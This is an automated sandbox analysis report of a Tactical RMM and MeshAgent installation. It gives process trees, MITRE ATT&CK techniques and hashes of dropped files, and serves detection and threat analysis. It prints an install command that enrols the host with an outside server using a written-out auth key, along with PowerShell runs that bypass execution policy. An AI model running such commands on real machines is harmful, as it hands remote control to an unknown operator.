      "cmd.exe" /c net start tacticalrmm
      4⤵
      System Location Discovery: System Language Discovery
      PID:576
    - - C:\Windows\SysWOW64\net.exe
        
        net start tacticalrmm
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1372
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start tacticalrmm
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1584
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.anyhourgroup.com --client-id 18 --site-id 20 --agent-type workstation --auth 2950028c1b24bdf87005eb9ecad5a3fdd22b8cd72dc981884f14357831a92cf7
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- - C:\Program Files\TacticalAgent\meshagent.exe
    "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2888
- - C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
    3⤵
    - Executes dropped EXE
    PID:2908

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2224
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1700
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:2232
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:1160
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3000

C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2468
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\2129053321.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2984
- C:\Program Files\Mesh Agent\MeshAgent.exe
  "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\1406696749.ps1
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
153KB

MD5
528392aa18652cbc50917df4537c9971

SHA1
03b01f8a51f5b7ee1e131bcaf16818ab26bd12f2

SHA256
50ee267bf2f75d4a3c07de4b1c21ce21e59ca92e6cc1463bdc4c713a54c113f9

SHA512
f8ef12755d26400a4b4e8dd417bd68b34ac187edf2702654b93e43aca7dc8df6e8536a40713c137467b8d5e8cd7fa920abfb9e7e1e5b67086f9d816ce73b3f5b

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
153KB

MD5
a9cd90ae1f2fdaab5a063bb7c7b4496b

SHA1
d7a88f3995f9eb4260823841d726a314bab2cfc9

SHA256
780783de1814ba1d1d55d4a23b8bffdce36ab4bde6798401b9cb84cc2f7543f9

SHA512
90d5d70caa69337635f16da5a904e084915eea6b215ee195267dfd12762af54a4c037c21ef06b81e94c89f476a1429a82935866cd0f74eb9698ec1efc5bdcd88

Download Submit
C:\Program Files\TacticalAgent\agent.log

Filesize
67B

MD5
c93c4854bb2bcf62c8c15dcf4d3ff140

SHA1
7f5a54c2e0f3c2b29d0e43028c20e7edea60a5e6

SHA256
fda3dafec3bdaf94635697b40125f1bfa9814ff0bc9c3a300362783f7f85244c

SHA512
aa052436ca1220ea7c80ce90ae70a006165045d21b6e3751e04917aec1fe538b6b13414fe7f2d8ccc767cedd21af74b07182bd2fa009e16548c7ff8cf65636d6

Download Submit
C:\ProgramData\TacticalRMM\1406696749.ps1

Filesize
35KB

MD5
e9fb33c49bee675e226d1afeef2740d9

SHA1
ded4e30152638c4e53db4c3c62a76fe0b69e60ab

SHA256
44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462

SHA512
2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48

Download Submit
C:\ProgramData\TacticalRMM\2129053321.ps1

Filesize
744B

MD5
06dc330e445d4cd7a11efaad01cfbc53

SHA1
450b3b2e4de7bd76e41a0db23e06a7a4e0268bd0

SHA256
75de145c8471a0197b365b03598cb1c9051a16fc0b96402efc2315980d6ac31a

SHA512
28f4ba27eee9cd83ba93b6069cdaa78f63402ab4a0171f3f6681ab8133036f5643a384f7942d9c4800c5b02bed194f832763f600adae2e172d94ea6dd187761b

Download Submit
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

Filesize
4.3MB

MD5
2f046950e65922336cd83bf0dbc9de33

SHA1
ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

SHA256
412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

SHA512
a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
105f58356a460db9692afd8b7dfdddb8

SHA1
8a8a5109fbd848115a75d4dc63097f5cc426be45

SHA256
a9bafe0de1a75f8e8aebad72a9339a265792e4037eac77a806c6b72ff8fc0eab

SHA512
f3e61f64dd913d76d348153c94010f6f045ea4b5893608d558dba7f28ed786e802f413648795b8d20ffb0282eb4bb8b849d0cae1020e73fd8062a72f251c6ac9

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5fed71d61db66bd10ccb71091bb276be

SHA1
552e8b14d76bfb0c4a5a0625dcb6fc185a17b9b2

SHA256
29cb6c6e3c9a8617a21543802c2819db6f5d555ddeaed5f6e61daba092dd2560

SHA512
c765cc7825f893ff51937039da2a762e0dfa560512c1e1b8db7e501774cb6cb7343aa3dfa81af517a7d324aba5882f567470edc2a14f9e2e777943c095e8b59d

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
8e1aec04a2441661088547ae3871fa1f

SHA1
d8b6808f08580ca80407e1d38e773ac1a1f2173c

SHA256
dc2d9c9420cb25a70d6d6f07128eb7fd1100fe23f66ae2f3156b8376dcaf53ab

SHA512
37babed437a1212ddac09d033c9a4386d49deaf4fce4a930b301de00f0e0a710914e553bec01f0205162da2857153f784afdc916198804c62b4f911ca0317edc

Download Submit
C:\Windows\Temp\CabB7DC.tmp

Filesize
29KB

MD5
d59a6b36c5a94916241a3ead50222b6f

SHA1
e274e9486d318c383bc4b9812844ba56f0cff3c6

SHA256
a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

SHA512
17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

Download Submit
C:\Windows\Temp\TarB998.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\Program Files\TacticalAgent\meshagent.exe

Filesize
3.3MB

MD5
69d3f6259c544aaac291475512a9200b

SHA1
830225b4f6a0eba3467844d33ed4cd54c9962f88

SHA256
6be666a5707b7ecb98c7247bf27fae4183fbc024178d879c936e37c7bc9edc0b

SHA512
267a2c2efecf8941a6aea5f46464c0ba57e0403253695514efc9c86156374f34c05c1473b88517d370d66a417591058cfc0874b738e28353c95d5ea7affb4f5e

Download Submit
\Program Files\TacticalAgent\tacticalrmm.exe

Filesize
9.2MB

MD5
bb383b7c3d5e4acb1001ab099b5b0f3c

SHA1
cb0c85f84a454aa4b1aab02bfba47c4355c2311e

SHA256
a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

SHA512
157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

Download Submit
\Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

Filesize
3.0MB

MD5
a639312111d278fee4f70299c134d620

SHA1
6144ca6e18a5444cdb9b633a6efee67aff931115

SHA256
4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

SHA512
f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

Download Submit
memory/1512-32-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-48-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-118-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-121-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-122-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-123-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-128-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-117-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1512-33-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1600-96-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

Filesize
2.9MB

Download
memory/1600-97-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

Filesize
32KB

Download
memory/1760-24-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2284-270-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2284-271-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2468-29-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2468-127-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2468-7-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2468-4-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2628-28-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download
memory/2628-14-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download
memory/2688-105-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/2688-106-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

Filesize
32KB

Download